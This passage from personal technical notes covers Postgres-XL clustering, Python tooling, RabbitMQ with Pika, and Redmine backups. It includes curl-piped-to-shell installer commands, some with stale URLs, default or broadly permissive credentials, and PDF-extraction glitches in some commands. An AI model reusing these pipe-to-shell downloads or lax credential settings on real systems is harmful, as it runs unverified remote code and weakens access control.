• (. . . ) in distributed tables, UNIQUE constraints must include the distribution column of the table • (. . . ) the distribution column must be included in PRIMARY KEY • (. . . ) column with REFERENCES (FK) should be the distribution column. • (. . . ) PRIMARY KEY must be the distribution column as well. In Postgres-XL, in distributed tables, UNIQUE constraints must include the distribution column of the table. This is because Postgres-XL currently only allows that it can push down to the Datanodes to be enforced locally. If we include the distribution column in unique constraints, it stands to reason that it can be enforced locally. If a table is distributed by ROUNDROBIN, we cannot enforce UNIQUE constraints because it does not have a distribution column; it is possible that the same value for a column exists on multiple nodes. There’s no restriction in UNIQUE constraint in replicated tables. When an expression is used on a UNIQUE constraint, this expression must contain the distribution column of its parent table. It cannot use other columns as well. As mentioned when discussing UNIQUE constraint, the distribution column must be included in PRIMARY KEY. Other restrictions apply to the PRIMARY KEY as well. When an expression is used on a PRIMARY KEY constraint, this expression must contain the distribution column of its parent table. It cannot use other columns as well.

42.5. Table distributing concept 299 Omid Raha MyStack Documentation, Release 0.1

Please note that column with REFERENCES should be the distribution column. This limitation is introduced because constraints are enforced only locally in each Datanode. In Postgres-XL, you cannot specify both PRIMARY KEY and REFERENCES key for different columns. In Postgres-XL, you cannot omit the column name in REFERENCES clause. In Postgres-XL, you cannot specify more than one foreign key constraints. Postgres-XL does not support exclusion constraints. Postgres-XL does not allow to modify the value of distribution column. https://www.postgres-xl.org/documentation/ddl-constraints.html https://www.postgres-xl.org/documentation/dml-update.html https://stackoverflow.com/questions/28547437/migrating-from-postgresql-to-postgres-xl-distributed-tables-design https://www.postgres-xl.org/documentation/upgrading.html

42.7 High Availability

You can add slaves for each node analogous to PostgreSQL’s streaming replication. In addition, the cluster can be configured such that the Global Transaction Manager (GTM) can have a GTM Standby. In terms of automatic failover, it is currently not part of the core project, but Corosync/Pacemaker has been used for this purpose. https://www.postgres-xl.org/documentation/warm-standby-failover.html https://www.postgres-xl.org/faq/ https://github.com/ClusterLabs/PAF https://github.com/bitnine-oss/postgres-xl-ha

42.8 Download https://www.postgres-xl.org/download/

42.9 Setting up Postgres-XL cluster

42.9.1 Install Postgres-XL

On each hosts: • postgres-xl-gtm (192.168.0.140) • postgres-xl-cr1 (192.168.0.141) • postgres-xl-dn1 (192.168.0.142) • postgres-xl-dn2 (192.168.0.143) Do the following commands:

300 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1

# Install requirements $ sudo apt-get upgrade $ sudo apt-get install build-essential $ sudo apt-get install libreadline-dev $ apt-get install zlib1g-dev $ apt-get install flex # Download postgres-xl $ wget https://www.postgres-xl.org/downloads/postgres-xl-9.5r1.6.tar.bz2 $ tar -xvjpf postgres-xl-9.5r1.6.tar.bz2 $ cd postgres-xl-9.5r1.6 # Install postgres-xl $ ./configure $ make All of Postgres-XL successfully made. Ready to install. $ sudo make install Postgres-XL installation complete. # Install pgxc_ctl $ cd contrib $ make $ sudo make install

$ sudo adduser postgres $ su postgres $ vim /home/postgres/.bashrc export PATH=/usr/local/pgsql/bin:$PATH

$ mkdir ~/.ssh

To fix these probable errors: bash: gtm_ctl: command not found bash: pg_ctl: command not found initdb: invalid locale settings; check LANG and LC_* environment variables

Add these lines to /etc/environment:

$ vim /etc/environment

PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/

˓→usr/local/games:/usr/local/pgsql/bin:" export LANG=en_US.utf-8 export LC_ALL=en_US.utf-8

On postgres-xl-gtm host:

$ su postgres $ ssh-keygen -t rsa Enter file in which to save the key(/home/postgres/.ssh/id_rsa): $ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

$ scp ~/.ssh/authorized_keys [email protected]:~/.ssh/ $ scp ~/.ssh/authorized_keys [email protected]:~/.ssh/ $ scp ~/.ssh/authorized_keys [email protected]:~/.ssh/

On every hosts:

42.9. Setting up Postgres-XL cluster 301 Omid Raha MyStack Documentation, Release 0.1

$ chmod 700 ~/.ssh $ chmod 600 ~/.ssh/authorized_keys

On postgres-xl-gtm host check ssh connecting to other hosts:

$ ssh [email protected] $ ssh [email protected] $ ssh [email protected]

42.9.2 Configure Postgres-XL

Configure pgxc_ctl.conf on postgres-xl-gtm host:

$ export dataDirRoot=$HOME/DATA/pgxl/nodes $ mkdir $HOME/pgxc_ctl $ pgxc_ctl

/bin/bash Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash. ERROR: File "/home/postgres/pgxc_ctl/pgxc_ctl.conf" not found or not a regular

˓→file. No such file or directory Installing pgxc_ctl_bash script as /home/postgres/pgxc_ctl/pgxc_ctl_bash. Reading configuration using /home/postgres/pgxc_ctl/pgxc_ctl_bash --home /home/

˓→postgres/pgxc_ctl --configuration /home/postgres/pgxc_ctl/pgxc_ctl.conf Finished reading configuration. ******** PGXC_CTL START ***************

Current directory: /home/postgres/pgxc_ctl

Create empty configuration file, on the PGXC console:

PGXC$ prepare config empty PGXC$ exit

$ vim ~/pgxc_ctl/pgxc_ctl.conf

pgxcOwner=postgres coordPgHbaEntries=(192.168.0.0/24) datanodePgHbaEntries=(192.168.0.0/24)

Configure gtm master node:

$ pgxc_ctl PGXC$ add gtm master gtm 192.168.0.140 20001 $dataDirRoot/gtm PGXC$ monitor all """ Running: gtm master """

Configure coordinator nodes:

PGXC$ add coordinator master cr1 192.168.0.141 30001 30011 $dataDirRoot/cr_master.1

˓→none none """ Success. (continues on next page)

302 Chapter 42. PostgreSQL Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) Starting coordinator master cr1 LOG: redirecting log output to logging collector process HINT: Future log output will appear in directory 'pg_log'. Done. """

PGXC$ monitor all """ Running: gtm master Running: coordinator master cr1 """

PGXC$ add coordinator master cr2 192.168.0.142 30002 30012 $dataDirRoot/cr_master.2

˓→none none """ Success. Starting coordinator master cr2 LOG: redirecting log output to logging collector process HINT: Future log output will appear in directory 'pg_log'. Done. """

PGXC$ monitor all """ Running: gtm master Running: coordinator master cr1 Running: coordinator master cr2 """

Configure data nodes:

PGXC$ add datanode master dn1 192.168.0.143 40001 40011 $dataDirRoot/dn_master.1

˓→none none none """ Success. Starting datanode master dn1. LOG: redirecting log output to logging collector process HINT: Future log output will appear in directory 'pg_log'. Done. """ PGXC$ monitor all """ Running: gtm master Running: coordinator master cr1 Running: coordinator master cr2 Running: datanode master dn1 """

PGXC$ add datanode master dn2 192.168.0.144 40002 40012 $dataDirRoot/dn_master.2

˓→none none none """ Success Starting datanode master dn2. LOG: redirecting log output to logging collector process HINT: Future log output will appear in directory 'pg_log'. Done. """ (continues on next page)

42.9. Setting up Postgres-XL cluster 303 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) PGXC$ monitor all """ Running: gtm master Running: coordinator master cr1 Running: coordinator master cr2 Running: datanode master dn1 Running: datanode master dn2 """

# To stop PGXC stop gtm master PGXC stop coordinator master cr1 PGXC stop coordinator master cr2 PGXC stop datanode master dn1 PGXC stop datanode master dn2

# To start PGXC start gtm master PGXC start coordinator master cr1 PGXC start coordinator master cr2 PGXC start datanode master dn1 PGXC start datanode master dn2 https://stackoverflow.com/questions/29225743/installing-postgres-xl-in-linux-in-distributed-environment https://ruihaijiang.wordpress.com/2015/09/17/postgres-xl-installation-example-on-linux/

42.10 Docker https://github.com/tiredpixel/postgres-xl-docker

42.11 Ansible https://gitlab.com/ansible-postgres-xl/postgres-xl-cluster/tree/master

42.12 Django https://github.com/omidraha/django-postgres-xl-example

42.13 Links https://www.postgres-xl.org/faq/ https://github.com/bitnine-oss/postgres-xl-ha https://github.com/systemapic/wu/wiki/Installing-Postgresql-XL https://www.postgres-xl.org/documentation/admin.html https://stackoverflow.com/questions/42431018/can-postgres-xl-shard-replicate-and-auto-balance-at-the-same-time

304 Chapter 42. PostgreSQL CHAPTER 43

Python

Contents:

43.1 Tips

43.1.1 String in Python 2 and 3

Python 2’s unicode() type was renamed str() in Python 3, str() was renamed bytes(), and basestring() disappeared In Python 3 all strings are Unicode while in Python 2 strings are bytes by default

43.1.2 OAUTH from oauth2client.client import OAuth2WebServerFlow

GOOGLE_CLIENT_ID=' ****' GOOGLE_CLIENT_SECRET=' ****'

# server side def get_flow(redirect_url=None): return OAuth2WebServerFlow(client_id=GOOGLE_CLIENT_ID, client_secret=GOOGLE_CLIENT_SECRET, scope='profile email', redirect_uri=redirect_url)

# Server create the oauth link with return url flow= get_flow('http://localhost:8000/auth/next/') url= flow.step1_get_authorize_url() # Client side # Client redirect user to this url: (continues on next page)

305 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) # https://accounts.google.com/o/oauth2/auth?scope=profile+email&redirect_uri=.... # Internal Google redirection: https://accounts.google.com/ServiceLogin?

˓→passive=1209600 # &continue=https://accounts.google.com/o/oauth2/auth?access_type.... # Google interactive login page # Google finally redirect user to the return url # http://localhost:8000/auth/next/?code=****** # Server get credentials from server code=' ******' credentials= flow.step2_exchange(code) print(credentials.__dict__)

43.1.3 Simple HTTP Server with Python

$ python -m SimpleHTTPServer 8002 # Python 3 $ python -m http.server 8002

43.1.4 What exactly does the T and Z mean in timestamp?

The T doesn’t really stand for anything. It is just the separator that the ISO 8601 combined date-time format requires. You can read it as an abbreviation for Time. The Z stands for the Zero timezone, as it is offset by 0 from the Coordinated Universal Time (UTC). Both characters are just static letters in the format, which is why they are not documented by the datetime.strftime() method. You could have used Q or M or Monty Python and the method would have returned them unchanged as well; the method only looks for patterns starting with % to replace those with information from the datetime object. http://stackoverflow.com/a/29282022

43.2 Modules

43.2.1 Dict Validator

https://pypi.python.org/pypi/voluptuous/ https://github.com/alecthomas/voluptuous https://github.com/j2labs/schematics https://github.com/dfm/schematics https://github.com/j2labs/dictshield https://github.com/exfm/ dictshield http://notario.cafepais.com/docs/index.html https://github.com/greenwoodcm/dict-validator https://github.com/halst/schema https://github.com/onyxfish/jsonschema https://github.com/Deepwalker/procrustes

306 Chapter 43. Python Omid Raha MyStack Documentation, Release 0.1

43.2.2 Schematics

converter: initial simple value converter, for example “180” to 180, or to 180.0, and or “” to None filter(s): convert value to another (complex) format value, for example “22/5/2013” to datetime(22,5,2013) validator: validate a value and return value or raise exception serialization: serialize value. Order of converter, filters and validators? validators and filters and converter may raise exceptions step 1: SampleModel(data) Model get raw_data as a dict and then pass the value of each key of dict to a corresponding field of Model. every field try to convert given value to a python data object. for example for this input {‘service_name’: 123} for service_name field as StringType in Model, it will converted to {‘service_name’: u‘123’} also exceptions may be raised here, for example if we given {‘service_name’: 12.3} to Model, then it will raise schematics.exceptions.ModelConversionError(u”Couldn’t interpret value as string.”) exception. at end, converted data is accessible from _data attribute of Model instance: SampleModel(data)._data step 2: SampleModel(data).validate() The converted data that is in _data pass to each validator or validators of field. in evey validation, before validate a value, the value will pass to convert method of filed, and _data will update for that value, if validation passed. looks at: /usr/local/lib/python2.7/dist-packages/schematics/validate.py:52

43.2.3 libnotify https://wiki.archlinux.org/index.php/libnotify#Python install libnotify, python-gobject packages.

#!/usr/bin/python from gi.repository import Notify Notify.init ("Hello world") Hello=Notify.Notification.new ("Hello world","This is an example notification.",

˓→"dialog-information") Hello.show ()

You may also use notify-send (on Debian-based systems, install the libnotify-bin package):

notify-send -i 'dialog-information' 'Summary' 'Message body.'

also kdialog’s passive popup option can be used:

kdialog --passivepopup kdialog --passivepopup 'This is a notification'5

43.2. Modules 307 Omid Raha MyStack Documentation, Release 0.1

43.2.4 Terminal npyscreen https://pypi.python.org/pypi/npyscreen/ Urwid http://urwid.org/index.html blessed https://github.com/ jquast/blessed

43.2.5 Install lxml on pyenv (virtual env)

43.3 Doctest http://docs.python.org/2/library/doctest.html

43.3.1 Directives http://docs.python.org/2/library/doctest.html#option-flags http://docs.python.org/2/library/doctest.html#directives # doctest: +ELLIPSIS

Next up, we are exploring the ellipsis. >>> import sys >>> sys.modules # doctest: +ELLIPSIS {...'sys':...} >>>'This is an expression that evaluates to a string' ... # doctest: +ELLIPSIS 'This is ... a string' >>>'This is also a string' # doctest: +ELLIPSIS 'This is ... a string' >>> import datetime >>> datetime.datetime.now().isoformat() # doctest: +ELLIPSIS '...-...-...T...:...:...' doctest: +NORMALIZE_WHITESPACE

Next, a demonstration of whitespace normalization. >>>[1,2,3,4,5,6,7,8,9] ... # doctest: +NORMALIZE_WHITESPACE [1, 2,3, 4, 5,6, 7, 8,9] >>> import sys >>> sys.stdout.write("This text\n contains weird spacing.") ... # doctest: +NORMALIZE_WHITESPACE This text contains weird spacing. doctest: +SKIP

Now we are telling doctest to skip a test >>>'This test would fail.' # doctest: +SKIP If it were allowed to run.

308 Chapter 43. Python Omid Raha MyStack Documentation, Release 0.1

This “test a little, code a little” style of programming is called Test-Driven Development, and you’ll find that it’s very productive.

43.4 South

43.4.1 Enable South for django apps(Converting existing apps)

Edit your settings.py and put south into INSTALLED_APPS (assuming you’ve installed it to the right place) Run python manage.py syncdb to load the South table into the database. Note that syncdb looks different now - South modifies it. Run python manage.py convert_to_south myapp - South will automatically make and pretend to apply your first mi- gration.

43.4.2 Example of using South for a model

Change the model field. run following cmd to detect and create a new migration file such as 001

$ python manage.py schemamigration myapp --auto

run following cmd to update migration table (south_migrationhistory) in db, and update myapp model in db

$ manage.py migrate myapp

43.5 PIP

43.5.1 Install pip

# install setup tools curl https://bitbucket.org/pypa/setuptools/raw/bootstrap/ez_setup.py | python - # install pip curl -L https://raw.github.com/pypa/pip/master/contrib/get-pip.py | python -

43.5.2 Use mirror to install packages

What to do when PyPI goes down Using Mirror Flag:

pip install --use-mirrors Django==1.6

43.5.3 virtualenv

install it:

pip install virtualenv

43.4. South 309 Omid Raha MyStack Documentation, Release 0.1 make a virtualenv: cd /srv/www/project_name virtualenv --no-site-packages env start it: source env/bin/activate install package manager: pip install django==1.8

43.5.4 pyenv

Install build packages:

$ sudo apt-get install -y make build-essential libssl-dev zlib1g-dev libbz2-dev \ libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev xz-

˓→utils https://github.com/yyuu/pyenv/wiki/Common-build-problems Install pyenv:

$ curl -L https://raw.githubusercontent.com/yyuu/pyenv-installer/master/bin/pyenv-

˓→installer | bash

Add pyenv configuration to ~/.bashrc:

$ vim ~/.bash_profile

# pyenv export PATH="/home/or/.pyenv/bin:$PATH" eval" $(pyenv init -)" eval" $(pyenv virtualenv-init -)"

Update it:

$ Update

Uninstall it:

$ rm -rf`pyenv root`

Walk through:

$ pyenv global $ pyenv versions * system(set by ~/.pyenv/version) $ pyenv install2.7.5 $ pyenv global2.7.5

Using pyenv virtualenv with pyenv:

310 Chapter 43. Python Omid Raha MyStack Documentation, Release 0.1

$ pyenv virtualenv2.7.5 env2.7.5 $ pyenv virtualenvs $ pyenv activate env2.7.5 $ python -V $ pip list $ pyenv deactivate $ which python

Sets the location where python-build stores temporary files

$ export TMPDIR="/tmp/pyenv"

See all available versions:

$ pyenv install --list https://github.com/yyuu/pyenv-virtualenv https://github.com/yyuu/pyenv-installer http://amaral-lab.org/resources/guides/pyenv-tutorial https://github.com/yyuu/pyenv/blob/master/plugins/python-build/README.md#special-environment-variables

43.5.5 Fixed bz2 warnings

WARNING: The Python bz2 extension was not compiled. Missing the bzip2 lib?

$ sudo apt-get install libbz2-dev

43.5.6 How do I install python-ldap in a virtualenv?

$ apt-get install libsasl2-dev python-dev libldap2-dev libssl-dev $(env) pip install python-ldap

43.5.7 Install python modules without root access

$ pip install --user package_name

43.5.8 Pip install from git repo branch

$ pip install git+https https://github.com/ansible/ansible

43.6 uWSGI uWSGI, Django and Nginx

43.6. uWSGI 311 Omid Raha MyStack Documentation, Release 0.1

43.7 Debug & Log

43.7.1 Debug http://www.slideshare.net/GrahamDumpleton/debugging-live-python-web-applications Pyrasite Django Debug Toolbar mmstats Metrology Python Low-Overhead Profiler Shrapnel

43.7.2 Log

Newrelic Graylog2 Graylog2 github logstash

43.8 Async, Sync, Blocking, None-Blocking, Threads gevent greenlet eventlet libevent epoll kqueue

43.9 Python Web frameworks

43.9.1 repoze repoze http://docs.repoze.org/bfg/current/narr/introduction.html#repoze-bfg-and-other-web-frameworks http://en.wikipedia.org/wiki/BlueBream#BlueBream https://plone.org/ http://en.wikipedia.org/wiki/Python_Paste http://en.wikipedia.org/wiki/Pylons_project/ http://www.pylonsproject.org/about/history http://www.turbogears.org/welcome/turbogears-way.html

312 Chapter 43. Python Omid Raha MyStack Documentation, Release 0.1

During the development of the 0.9 series, several features of Paste were extracted into smaller, more focused packages. The testing suite became WebTest, the WSGI wrappers became WebOb, and the interactive debugging environment became WebError. Pylons 0.9 follows these developments by switching from using Paste to the new packages which provide more functionality with little to no backwards incompatibility issues. Pylons Merger with repoze.bfg and Birth of Pyramid Web Framework Pyramid is an open source web framework written in Python and is based on WSGI. It is a minimalistic web framework inspired by , Pylons and Django. Pyramid Originally called “repoze.bfg”. In 2010 the Pylons framework will move over to using BFG as a base in version 1.5. As a result of the inclusion of BFG into the Pylons project, BFG was renamed Pyramid

43.10 Supervisor

43.10.1 Step by step example

Install and run supervisor

# apt-get install supervisor # service supervisor status # service supervisor restart

we’ll assume we have a shell script we wish to keep persistently running, that we have saved at ~/workspace/ script/run/dstat_network_bandwidth_usage.sh and looks like the following:

#!/bin/bash dstat -tn --output ~/workspace/script/report/dstat_network_bandwidth_usage.csv --

˓→noupdate 3600

Make this script executable:

$ chmod +x /usr/local/bin/long.sh

The program configuration files for Supervisor programs are found in the /etc/supervisor/conf.d directory, normally with one program per file and a .conf extension. A simple configuration for our script, saved at /etc/ supervisor/conf.d/dstat.conf, would look like so:

[program:dstat_network_bandwidth_usage] command=~/workspace/script/run/dstat_network_bandwidth_usage.sh autostart=true autorestart=true stderr_logfile=/var/log/dstat_network_bandwidth_usage.err.log stdout_logfile=/var/log/dstat_network_bandwidth_usage.out.log user=or

Once our configuration file is created and saved, we can inform Supervisor of our new program through the supervisorctl command. First we change directory path to /etc/supervisor/ and tell Supervisor to look for any new or changed program configurations in the /etc/supervisor/conf.d directory with:

# cd /etc/supervisor/ # supervisorctl reread

Followed by telling it to enact any changes with:

43.10. Supervisor 313 Omid Raha MyStack Documentation, Release 0.1

# supervisorctl update

To enter the interactive mode, start supervisorctl with no arguments:

# supervisorctl dstat_network_bandwidth_usage RUNNING pid 13405, uptime0:14:49 $ supervisor> status dstat_network_bandwidth_usage RUNNING pid 13405, uptime0:14:52 $ supervisor> supervisor> restart dstat_network_bandwidth_usage dstat_network_bandwidth_usage: stopped dstat_network_bandwidth_usage: started $ supervisor> status dstat_network_bandwidth_usage RUNNING pid 13720, uptime0:00:06 $ supervisor>

43.10.2 Links https://serversforhackers.com/monitoring-processes-with-supervisord https://www.digitalocean.com/community/tutorials/how-to-install-and-manage-supervisor-on-ubuntu-and-debian-vps

43.11 Celery

43.11.1 How to disallow pickle serialization in celery?

Add these lines to celery config file:

CELERY_ACCEPT_CONTENT=['json'] CELERY_TASK_SERIALIZER='json' CELERY_RESULT_SERIALIZER='json'

If not work, try this:

CELERY_ACCEPT_CONTENT=['json'] from kombu import serialization serialization.registry._decoders.pop("application/x-python-serialize") http://stackoverflow.com/questions/6628016/how-to-disallow-pickle-serialization-in-celery

43.11.2 Is CELERY_RESULT_BACKEND necessary?

If you want to get the result of a task back, or you want to know when the task is completed, then you need a result backend.

@task def x(): pass t=x.delay() t.state # always PENDING unless you have a RESULT_BACKEND and not ignore_result. t.result # always None unless...

314 Chapter 43. Python Omid Raha MyStack Documentation, Release 0.1 http://docs.celeryproject.org/en/latest/configuration.html#std:setting-CELERY_RESULT_BACKEND https://groups.google.com/forum/#!topic/celery-users/3OBTaaoKsTU

43.11.3 Using Amazon SQS http://docs.celeryproject.org/en/latest/getting-started/brokers/sqs.html

43.11.4 Use celery with different code base in API and workers http://stackoverflow.com/a/36977126 http://docs.celeryproject.org/en/latest/userguide/canvas.html#signatures

43.11.5 Chain tasks on celery t1= my_task_01.subtask((arg1,), immutable=True) t2= my_task_02.subtask((arg1, arg2), immutable=True) t3= my_task_01.subtask((arg1,), immutable=True) task_list=[t1, t2, t3] tasks= chain(task_list) tasks.apply_async()

The next task will run, if previous task run successfully. The immutable option is set to True, so the result of each task won’t send to the next task.

43.12 PyInstaller https://github.com/pyinstaller/pyinstaller

43.13 Package Windows binaries while running under Linux

Sample (sample.py) python code, It’s rest application that run with waitress wsgi server

$ cat ~/ws/wine/sample.py from pycnic.core import WSGI, Handler from waitress import serve class Hello(Handler): def get(self, name="World"): return {"message":"Hello, %s!"% (name)} class app(WSGI): routes=[ ('/', Hello()), ('/([\w]+)', Hello()) (continues on next page)

43.12. PyInstaller 315 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) ] serve(app, host='0.0.0.0', port=9999)

43.13.1 Install Wine

$ sudo apt-get install wine $ winecfg

43.13.2 Install Python

# note: Download 32bit of python from python.org $ wine msiexec -i ~/ws/tools/windows/python/python-2.7.13.msi ALLUSERS=1 # @note: Install VCForPython27 if we want complie some python package from source code $ wine msiexec /i ~/ws/tools/windows/python/VCForPython27.msi ALLUSERS=1 # Install python dependency of sample program by using pip $ cd ~/ws/wine/ $ wine ~/.wine/drive_c/Python27/python.exe ~/.wine/drive_c/Python27/Scripts/pip.exe

˓→install waitress $ wine ~/.wine/drive_c/Python27/python.exe ~/.wine/drive_c/Python27/Scripts/pip.exe

˓→install pycnic # Install pyinstaller $ wine ~/.wine/drive_c/Python27/python.exe ~/.wine/drive_c/Python27/Scripts/pip.exe

˓→install pyinstaller $ cp ~/ws/wine/sample.py ~/.wine/drive_c/users/$USER/Desktop/sample.py $ wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile ~/.wine/drive_c/

˓→users/$USER/Desktop/sample.py $ ls dist/ sample.exe https://github.com/pyinstaller/pyinstaller/wiki/FAQ https://github.com/paulfurley/python-windows-packager https://www.paulfurley.com/packaging-python-for-windows-pyinstaller-wine/ https://stackoverflow.com/a/35605479 https://milkator.wordpress.com/2014/07/19/windows-executable-from-python-developing-in-ubuntu/ https://pythonhosted.org/PyInstaller/installation.html#installing-in-windows

43.14 Selenium

$ pip install selenium # For `Firefox` browser download `geckodriver` at https://github.com/mozilla/

˓→geckodriver/releases # and append directory of `geckodriver` to the PATH: $ export PATH=$PATH:/home/or/ws/tools/selenium http://selenium-python.readthedocs.io/installation.html#drivers

316 Chapter 43. Python Omid Raha MyStack Documentation, Release 0.1

from selenium import webdriver from selenium.webdriver.common.keys import Keys # create a new Firefox session driver= webdriver.Firefox() driver.implicitly_kwait(30) driver.maximize_window() # navigate to the application home page driver.get("http://www.google.com") # get the search textbox search_field= driver.find_element_by_id("lst-ib") search_field.clear() # enter search keyword and submit search_field.send_keys("Selenium WebDriver Interview questions") search_field.submit() # get the list of elements which are displayed after the search # currently on result page using find_elements_by_class_name method lists= driver.find_elements_by_class_name("_Rm") # get the number of elements found print ("Found"+ str(len(lists))+"searches:”) # iterate through each element and print the text that is # name of the search i=0 for item in lists: print (item) i=i+1 if(i>10): break # close the browser window

43.15 robot framework pip install robotframework pip install docutils pip install robotframework-seleniumlibrary pip install robotframework-selenium2library

Docs: http://robotframework.org/SeleniumLibrary/SeleniumLibrary.html http://robotframework.org/robotframework/latest/libraries/BuiltIn.html http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html

43.15. robot framework 317 Omid Raha MyStack Documentation, Release 0.1

318 Chapter 43. Python CHAPTER 44

RabbitMQ

Contents:

44.1 Introduction

Let’s think about Rabbit as a delivery service. Your app can send and receive packages. The server with the data you need can send and receive too. The role RabbitMQ plays is as the router between your app and the “server” it’s talking to. So when your app connects to RabbitMQ, it has a decision to make: am I sending or receiving? Or in AMQP talk, am I a producer or a consumer? Producers create messages and publish (send) them to a broker server (RabbitMQ). What’s a message? A message has two parts: a payload and a label. The payload is the data you want to transmit. It can be anything from a JSON array to an MPEG-4 of your favorite iguana Ziggy. RabbitMQ doesn’t care. The label is more interesting. It describes the payload, and is how RabbitMQ will determine who should get a copy of your message. Unlike, for example, TCP, where you specify a specific sender and a specific receiver, AMQP only describes the message with a label (an exchange name and optionally a topic tag) and leaves it to Rabbit to send it to interested receivers based on that label. The communication is fire-and-forget and one-directional. Consumers are just as simple. They attach to a broker server and subscribe to a queue.

44.2 Docker

Run RabbitMQ

$ docker run --hostname my-r1 --name r1 -p4369:4369 -p5671:5671 -p5672:5672 -

˓→p25672:25672 rabbitmq:3

Add RabbitMQ virtual host:

319 Omid Raha MyStack Documentation, Release 0.1

$ docker exec -it /bin/bash root@my-r1:/# rabbitmqctl add_vhost new_vhost root@my-r1:/# rabbitmqctl set_user_tags guest my_new_tag root@my-r1:/# rabbitmqctl set_permissions -p new_vhost guest". *"". *"". *" http://docs.celeryproject.org/en/latest/getting-started/brokers/rabbitmq.html#setting-up-rabbitmq

44.3 Pika

44.3.1 Exchange

A default exchange, identify by the empty string (“”) will be used. The default exchange means that messages are routed to the queue with the name specified by routing_key, if it exists. (The default exchange is a direct exchange with no name). import pika # Open a connection to RabbitMQ on localhost using all default parameters connection= pika.BlockingConnection(pika.ConnectionParameters(host='localhost')) connection= pika.BlockingConnection(pika.ConnectionParameters(host='127.0.0.1',

˓→virtual_host='sample_vhost', heartbeat_interval=0)) # Open the channel channel= connection.channel() channel.exchange_declare(exchange='exh_01', durable=True, type='fanout')

44.3.2 Publish channel.basic_publish(exchange='exh_01', routing_key='', body="message_01") channel.basic_publish(exchange='exh_01', routing_key='', body="message_02")

Subscribe

44.3.3 Queue result= channel.queue_declare(queue="queue_01", durable=True, exclusive=False, auto_

˓→delete=False)

44.3.4 Bindings

We’ve already created a fanout exchange and a queue. Now we need to tell the exchange to send messages to our queue. That relationship between exchange and a queue is called a binding. channel.queue_bind(exchange="exh_01", queue=result.method.queue)

Subscribe

320 Chapter 44. RabbitMQ Omid Raha MyStack Documentation, Release 0.1

def callback(ch, method, properties, body): print(" [x] %r"% body) queue_name= result.method.queue channel.basic_consume(callback, queue=queue_name, no_ack=True) channel.start_consuming() http://stackoverflow.com/questions/10620976/rabbitmq-amqp-single-queue-multiple-consumers-for-same-message

44.3.5 Delete Queue

$ rabbitmqctl list_queues import pika connection= pika.BlockingConnection(pika.ConnectionParameters('localhost', virtual_

˓→host='sample_vhost')) channel= connection.channel() channel.queue_delete(queue='hello') connection.close() https://pika.readthedocs.io/en/latest/modules/channel.html#pika.channel.Channel.queue_delete

44.3.6 Delete Exchange

$ rabbitmqctl list_exchanges import pika connection= pika.BlockingConnection(pika.ConnectionParameters('localhost', virtual_

˓→host='sample_vhost')) channel= connection.channel() channel.exchange_delete(exchange='hello') connection.close() http://pika.readthedocs.io/en/latest/modules/channel.html#pika.channel.Channel.exchange_delete

44.3. Pika 321 Omid Raha MyStack Documentation, Release 0.1

322 Chapter 44. RabbitMQ CHAPTER 45

Redmine

Contents:

45.1 Tips

45.1.1 Path of redmine plugins

$ /srv/redmine/plugins

45.1.2 How to install a new plugin http://www.redmine.org/projects/redmine/wiki/Plugins

45.1.3 How to install CKEditor plugin for redmine http://www.redmine.org/plugins/redmine-ckeditor https://github.com/a-ono/redmine_ckeditor

$ cd /srv/redmine/plugins $ git clone https://github.com/a-ono/redmine_ckeditor $ cd /srv/redmine/ $ bundle install $ bundle update $ vim /srv/redmine/config/environments/development.rb # set `config.eager_load =

˓→false` $ vim /srv/redmine/config/environments/test.rb # set `config.eager_load = false` $ vim /srv/redmine/config/environments/production.rb # set `config.eager_load = true` $ rake redmine:plugins:migrate RAILS_ENV=production $ service nginx restart

323 Omid Raha MyStack Documentation, Release 0.1

45.1.4 How to restart redmine

To restart redmine, just restart your web server

$ service nginx restart

45.1.5 how to show code changes on issues http://www.redmine.org/boards/2/topics/21287 http://www.redmine.org/boards/2/topics/22654?r=37948 http://www.redmine.org/projects/redmine/wiki/RedmineSettings#Referencing-issues-in-commit-messages

45.1.6 Backup Redmine

Redmine backups should include: data (stored in your redmine database) attachments (stored in the files directory of your Redmine install) Backup raw redmine mysql database:

$ /usr/bin/mysqldump -u -p | gzip > /path/to/

˓→backup/db/redmine_`date +%y_%m_%d`.gz $ mysqldump -u root redmine | gzip > redmine_`date +%y_%m_%d`.gz

Backup redmine mysql database with postgres compatibility format:

$ mysqldump -u root --compatible=postgresql --default-character-set=utf8 redmine |

˓→gzip > redmine_`date +%y_%m_%d`.gz

But, this option may be not work when you want to restore data base to postgresql, even when used with some script like: https://github.com/lanyrd/mysql-postgresql-converter Backup mysql redmine database with pgloader from mysql server and directly restore to to the postgres server:

$ sudo apt-get install pgloader $ su - postgres postgres@debian:~$ createdb redmine # listen to remote running program on the remote host on the local host $ ssh -N @ -L 3306:localhost:3306 postgres@debian:~$ pgloader mysql://:@127.0.0.1/redmine postgresql:///

˓→redmine

Log of migration:

$ tail -f /tmp/pgloader/pgloader.log

Note that warning is not important: warning: table "" does not exist, skipping

324 Chapter 45. Redmine Omid Raha MyStack Documentation, Release 0.1

https://github.com/dimitri/pgloader http://pgloader.io/howto/pgloader.1.html http://pgloader.io/howto/mysql.html Download backup files:

$ scp @:/ . $ scp @:/srv/redmine/files/ files

http://www.redmine.org/projects/redmine/wiki/RedmineInstall#Backups http://www.redmine.org/projects/redmine/wiki/RedmineUpgrade

45.1.7 Setup redmine with docker image

Setup redmine with docker image and restore data from backup

$ docker pull postgresql $ docker pull redmine

$ docker run --name postgres-01 -e POSTGRES_USER=postgres -e POSTGRES_PASSWORD=postgres postgres

# create redmine data base $ createdb -U postgres -h 172.17.0.2 redmine

# restore db data to postgres $ psql -U postgres -h 172.17.0.2 -d redmine -f redmine_backup_pg_dump.sql $ docker run --name redmine-01 -e POSTGRES_ENV_POSTGRES_USER=postgres -e POSTGRES_ENV_POSTGRES_PASSWORD=postgres -e POSTGRES_ENV_POSTGRES_DB=redmine --link postgres-01:postgres redmine

